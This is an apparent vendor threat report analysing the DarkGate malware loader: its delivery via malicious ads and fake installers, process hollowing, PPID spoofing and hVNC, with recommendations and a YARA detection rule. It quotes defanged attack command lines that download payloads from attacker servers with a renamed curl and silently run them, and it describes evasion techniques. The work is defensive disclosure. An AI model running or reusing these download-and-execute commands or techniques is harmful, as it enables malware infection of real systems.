Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.

We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.

Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.

In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.

Here’s the latest from our TRU Team…

What did we find?

Since August 2023, the eSentire Threat Response Unit (TRU) has observed two cases of DarkGate infection targeting the Finance and Manufacturing industries. The stealer was delivered via drive-by downloads disguised as fake installers, such as an Advanced IP scanner, as well as fake document reports.

DarkGate, a loader written in Borland Delphi, was first announced for sale on a Russian-speaking hacking forum in early June 2023. The loader developer claimed to have been working on the project since 2017. DarkGate has an extensive list of features, including hVNC, hAnyDesk, credential stealing, crypto mining, rootkit, reverse proxy, keylogger, remote desktop, etc. The loader is priced at $1,000 for a one-day use and $15,000 for monthly usage.

For the initial access, the loader delivers in a format of LNK, VBS, and MSI, which leads to the execution of the AutoIt script.

The developer of DarkGate has announced a CrackMe challenge on the forum, offering a reward of $30,000 to anyone who can bypass the licensing system of the loader's builder/panel.

The DarkGate loader has grown significantly in popularity, with the developer stating it reached 30 users per month. However, the developer is no longer issuing licenses to new users.

RastaFarEye, the mastermind behind DarkGate, is reputed to be a seasoned malware developer, according to users on hacking forums. He is also believed to be the creator of the stealer identified by Kaspersky as “GreetingGhoul”.

Delivery and Technical Analysis

The initial access occurred via a drive-by download. The user was searching for unclaimed money and navigated to the malicious site via Google Ads and downloaded an automatically generated fake report as a ZIP archive that contained the malicious VBS script.

We found three additional websites potentially serving the payloads:

• freelookup[.]org
• treasurydept[.]org
• capitalfinders[.]org

Interestingly enough, Danabot used the same payload delivery technique reported by a Threat Researcher at Proofpoint.

The VBS script leads to the execution of the following command:

• "/c cd /d C:\Users\%USERNAME%\AppData\Local\Temp\ & copy c:\windows\system32\curl[.]exe HnVMJmSBX[.]exe & HnVMJmSBX[.]exe -o aDRQdO[.]msi hxxps[://]plano[.]soulcarelife[.]org/?5nzumurxizhrb3bpztdybha98e8 & C:\Windows\System32\msiexec[.]exe /i aDRQdO[.]msi /qn"

The script retrieves the MSI installer from one of the attacker-controlled servers. 

The execution of MSI installer eventually leads to the following command execution:

• "C:\Windows\System32\cmd[.]exe" /c mkdir c:\bclr & cd /d c:\bclr & copy c:\windows\system32\curl.exe bclr.exe & bclr -H "User-Agent: curl" -o Autoit3.exe hxxp[://]whatup[.]cloud:9999 & bclr -o kdvyeg.au3 hxxp[://]whatup[.]cloud:9999/msibclrlapx & Autoit3.exe kdvyeg.au3

The command creates the bclr directory under C:\, copies curl.exe from C:\Windows\system32 and renames it as bclr.exe to bclr directory, and downloads kdvyeg.au3 (MD5: 296c88dda6b9864da68f0918a6a7280d) (DarkGate AutoIT script) and Autoit3.exe files.

Threat Analyst @0xToxin already performed a great analysis of the AutoIt script that can be accessed here.

Upon initial infection, DarkGate achieves persistence on the host via the Startup folder to run the malicious AutoIt script dropped under the ProgramData folder as shown below. The shortcut file is removed by the injected process and recreated periodically, which makes it hard for an analyst to identify the persistence mechanism.

In the case we were investigating, the loader opens the decoy PDF file shown below.

Compared to the previous version of DarkGate where the final DarkGate payload would be decrypted via an XOR routine, the latest DarkGate version utilizes a custom base64-encoding algorithm, as shown below.

In the previous version, when decrypting the final payload, it contained a configuration with a custom base64-encoded string. In the newer version, the configuration and the C2 domains are separated into two distinct parts. The configuration part is ZLIB-compressed and custom base64-encoded.

As mentioned above, DarkGate has the hVNC capability. From the snippet shown below, the hVNC is broken into different phases including Cleaning Virtual Desk Processes Phase involving thread termination, Browser Handling Phase (possibly handling certain browser attributes or configurations), and Optimization Phase where certain browser settings are disabled for a better performance such as disabling audio, sandboxing feature, disabling GPU hardware acceleration etc.

DarkGate performs process hollowing for the core and additional payloads into one of the processes:

• GoogleUpdate.exe
• TabTip32.exe
• BraveUpdate.exe
• MicrosoftEdgeUpdate.exe
• ielowutil.exe

If process hollowing fails for the above processes, DarkGate proceeds with injecting into cmd.exe which subsequently spawns notepad.exe. We have observed DarkGate injecting DanaBot into notepad.exe. Additionally, the UAC bypass module was also used for injection. Upon terminating the injected process, DarkGate implements PPID spoofing (Parent Process ID Spoofing).

PPID spoofing involves manipulating the parent process ID attribute of a newly created process. This is done to deceive security solutions into believing the new process was created by a legitimate parent process.

In case there is an attempt to terminate this malicious process, it has the capability to reinitialize itself under another spoofed parent process, continuing its malicious activities while staying under the radar.

In the code snippet provided, the DarkGate malware attempts to open the desired process and spoof it, repeating the attempt up to 12 times until successful. This process involves initializing and updating a thread attribute list. If successful, the execution flow progresses to a function where it allocates memory within the targeted process, writes malicious code into that memory space, and initiates a new thread within the target process to execute the injected code.

If the spoofing attempts fail after 12 tries, it exits with an error, specifically indicating an “InjectCustomShellcodeWithParamsAndSpoff failure”.

We can confirm whether the loader is using the PPID spoofing technique by running the Despoof tool that detects process spoofing written by our Principal Security Researcher, Jacob Gajek.

DarkGate has the ability to manipulate browser data, delete shadow copies (provided the user has administrative rights), and initiate a shutdown of the infected host.

It’s also worth mentioning that compared to previous versions of DarkGate, where the strings were encoded with custom base64-encoded strings, with the new version the byte arrays are used as inputs instead to break the existing scripts to decode the custom base64-encoded strings.

What did we do?

• Our team of 24/7 SOC Cyber Analysts isolated the affected host to contain the infection.
• Provided remediation recommendations and support to the customer.

What can you learn from this TRU Positive?

• The DarkGate loader is rapidly becoming favored amongst threat actors owing to its stealth features and extensive array of capabilities.
• The loader is using PPID spoofing to evade detections.
• In the infection chain we observed, DanaBot appears to be deployed by the DarkGate loader.

Recommendations from our Threat Response Unit (TRU) Team:

Protecting against information stealers requires a multi-layered defense approach to defend endpoints from malware and detect or block unauthorized login activity against applications and remote access services.

Therefore, we recommend:

• Protecting endpoints against malware.

• Ensure antivirus signatures are up to date.

• Use a Next-Gen AV (NGAV) or Endpoint Detection and Response (EDR) product to detect and contain threats.
• If an information stealing malware is identified, reset the user’s credentials, and terminate logon sessions immediately.

• Encouraging good cybersecurity hygiene among your users by using Phishing and Security Awareness Training (PSAT) when downloading software from the Internet.
• Restricting access to enterprise applications from personal devices outside the scope of security monitoring.
• Ensuring adequate logging is in place for remote access services such as VPNs and using modern authentication methods, which support MFA and conditional access.
• Prevent web browsers from automatically saving and storing passwords.

• Use of reputable password managers is recommended instead.

Indicators of Compromise

Yara

rule DarkGate {
    meta:
        author = "RussianPanda"
        description = "Detects DarkGate" 
        date = "9/17/2023"
    strings:
        $s1 = "hanydesk"
        $s2 = "darkgate.com"
        $s3 = "zLAxuU0kQKf3sWE7ePRO2imyg9GSpVoYC6rhlX48ZHnvjJDBNFtMd1I5acwbqT+="
        $s4 = {80 e3 30 81 e3 ff 00 00 00 c1 eb 04}
        $s5 = {80 e3 3c 81 e3 ff 00 00 00 c1 eb 02} 
        $s6 = {80 e1 03 c1 e1 06}
    condition:
        all of ($s*) 
        and uint16(0) == 0x5A4D
    }

Reference

• https://securelist.com/doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer/109982/
• https://twitter.com/ffforward/status/1461417886526984195?s=20
• https://0xtoxin.github.io/threat breakdown/DarkGate-Camapign-Analysis/